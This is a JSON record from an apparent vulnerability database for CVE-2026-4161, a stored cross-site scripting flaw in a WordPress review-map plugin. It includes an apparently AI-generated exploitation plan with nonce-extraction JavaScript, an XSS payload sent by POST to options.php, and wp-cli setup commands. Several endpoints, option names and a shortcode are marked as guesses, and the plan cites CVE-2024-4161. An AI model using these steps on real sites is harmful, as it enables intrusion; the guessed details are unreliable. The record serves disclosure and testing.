[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f-jOGQzVwVI5UizLnpD9Slvvz5y7WshW8Qc9_vCOyQl4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":25,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":29},"CVE-2026-4161","review-map-by-revukangaroo-authenticated-administrator-stored-cross-site-scripting-via-plugin-settings","Review Map by RevuKangaroo \u003C= 1.7 - Authenticated (Administrator+) Stored Cross-Site Scripting via Plugin Settings","The Review Map by RevuKangaroo plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin settings in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","review-map-by-revukangaroo",null,"\u003C=1.7","medium",4.4,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:H\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-20 15:16:09","2026-03-21 03:27:06",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd632bc58-f441-48fb-848c-40b22d3aa562?source=api-prod",[],"researched",false,3,"# Research Plan: CVE-2024-4161 - Review Map by RevuKangaroo Stored XSS\n\n## 1. Vulnerability Summary\nThe **Review Map by RevuKangaroo** plugin (versions \u003C= 1.7) contains a stored cross-site scripting (XSS) vulnerability. The flaw exists because the plugin fails to sanitize or escape user-supplied input when saving and displaying its settings. \n\nWhile the vulnerability requires **Administrator+** privileges, it is significant in **WordPress Multisite** environments or installations where the `unfiltered_html` capability is disabled for administrators (e.g., by the `DISALLOW_UNFILTERED_HTML` constant). In these contexts, an administrator is restricted from using dangerous HTML, but this plugin provides a bypass by incorrectly handling setting updates.\n\n## 2. Attack Vector Analysis\n- **Vulnerable Endpoint**: Plugin settings page, typically located at `\u002Fwp-admin\u002Fadmin.php?page=review-map-settings` (inferred) or via the WordPress Settings API at `\u002Fwp-admin\u002Foptions.php`.\n- **HTTP Parameter**: Specific setting fields (e.g., API keys, map titles, or custom CSS fields) saved in the `wp_options` table.\n- **Authentication**: Required (Administrator or Super Admin).\n- **Preconditions**:\n    - Plugin installed and active.\n    - `unfiltered_html` capability must be disabled (standard for non-Super Admins on Multisite).\n\n## 3. Code Flow (Inferred)\n1. **Entry Point**: The administrator navigates to the Review Map settings page.\n2. **Input**: The admin enters a payload (e.g., `\u003Cscript>alert(1)\u003C\u002Fscript>`) into a configuration field and submits the form.\n3. **Processing**: The plugin likely uses `register_setting` or a custom `admin_init` hook to process the `POST` request. It fails to apply `sanitize_text_field()` or `wp_kses()` before calling `update_option()`.\n4. **Storage**: The payload is stored raw in the database (`wp_options`).\n5. **Sink**: When the map is rendered (via shortcode on the frontend or on the settings preview), the plugin retrieves the value using `get_option()` and echoes it directly without using `esc_html()`, `esc_attr()`, or `wp_kses()`.\n\n## 4. Nonce Acquisition Strategy\nThe plugin likely uses the WordPress Settings API or a standard admin form with a CSRF nonce.\n\n1. **Identify the Page**: Use `wp-cli` to find the settings page slug:\n   `wp admin-menu list | grep \"Review Map\"`\n2. **Navigate**: Use `browser_navigate` to visit the settings page.\n3. **Extract Nonce and Fields**: Use `browser_eval` to inspect the form.\n   ```javascript\n   \u002F\u002F Common patterns for Settings API or custom forms\n   (() => {\n     return {\n       nonce: document.querySelector('input[name=\"_wpnonce\"]')?.value,\n       action: document.querySelector('form')?.action,\n       option_page: document.querySelector('input[name=\"option_page\"]')?.value,\n       fields: Array.from(document.querySelectorAll('input[type=\"text\"], textarea')).map(i => i.name)\n     };\n   })()\n   ```\n4. **Note**: If the plugin uses `options.php`, the nonce action is usually `${option_group}-options`.\n\n## 5. Exploitation Strategy\n### Step 1: Discover Input Fields\nAccess the settings page and identify which fields are available for modification.\n- **URL**: `\u002Fwp-admin\u002Fadmin.php?page=review-map-settings` (inferred)\n\n### Step 2: Inject Payload\nPerform a POST request to update the settings with the XSS payload. \n*Note: We assume the plugin uses the standard `options.php` route.*\n\n- **Method**: POST\n- **URL**: `http:\u002F\u002Fvulnerable-site.local\u002Fwp-admin\u002Foptions.php`\n- **Content-Type**: `application\u002Fx-www-form-urlencoded`\n- **Payload**:\n  ```\n  option_page=review_map_settings_group&\n  action=update&\n  _wpnonce=[EXTRACTED_NONCE]&\n  review_map_api_key=\u003Cscript>alert(document.domain)\u003C\u002Fscript>&\n  submit=Save+Settings\n  ```\n\n### Step 3: Trigger Execution\nIdentify where the setting is reflected. This is typically on the frontend where the map is displayed.\n1. Create a post with the plugin's shortcode.\n2. Visit the post as any user.\n\n## 6. Test Data Setup\n1. **Install Plugin**: Ensure Review Map by RevuKangaroo \u003C= 1.7 is active.\n2. **Restrict Capabilities**: Add `define( 'DISALLOW_UNFILTERED_HTML', true );` to `wp-config.php` to simulate the vulnerable environment for the Admin user.\n3. **Create Target Page**:\n   `wp post create --post_type=page --post_title=\"Review Map Page\" --post_status=publish --post_content='[revukangaroo_map]'` (Shortcode inferred from plugin name).\n4. **Create Admin**:\n   `wp user create attacker admin@example.com --role=administrator --user_pass=password`\n\n## 7. Expected Results\n- The settings update should succeed.\n- Navigating to the page containing the shortcode (or returning to the settings page) should trigger a JavaScript alert box, confirming the payload was stored and executed without escaping.\n\n## 8. Verification Steps\n1. **Check Database**: Verify the payload is stored raw.\n   `wp option get review_map_api_key` (inferred option name).\n2. **Check Frontend Source**:\n   Use `http_request` to fetch the frontend page and grep for the raw payload.\n   `grep \"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\" response_body.html`\n\n## 9. Alternative Approaches\nIf the plugin does not use `options.php`:\n1. **Custom AJAX**: Check for `wp_ajax_` hooks in the code. If found, use `admin-ajax.php` with the appropriate `action` and `nonce`.\n2. **Custom Admin Post**: Look for `admin_post` hooks and send the request to `admin-post.php`.\n3. **Frontend Reflected**: If the settings page itself reflects the value immediately after saving, the XSS will trigger in the Admin's own browser first.","The Review Map by RevuKangaroo plugin for WordPress is vulnerable to Stored Cross-Site Scripting via its settings page in versions up to 1.7. This allows authenticated administrators to inject arbitrary JavaScript because the plugin fails to sanitize input and escape output of configuration fields. This vulnerability primarily affects WordPress Multisite environments or installations where administrators have the 'unfiltered_html' capability disabled.","1. Authenticate as an Administrator or higher on a site where unfiltered_html is restricted (e.g., a WordPress Multisite instance).\n2. Navigate to the Review Map settings page (likely located at \u002Fwp-admin\u002Fadmin.php?page=review-map-settings).\n3. Locate a configuration field, such as an API key or title field, and input a JavaScript payload (e.g., \u003Cscript>alert(document.domain)\u003C\u002Fscript>).\n4. Submit the settings form to save the payload into the site's options table.\n5. Trigger the payload by visiting the frontend page where the plugin's shortcode ([revukangaroo_map]) is used, or by revisiting the settings page.","gemini-3-flash-preview","2026-04-18 00:49:36","2026-04-18 00:49:53",{"type":30,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":31},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Freview-map-by-revukangaroo\u002Ftags"]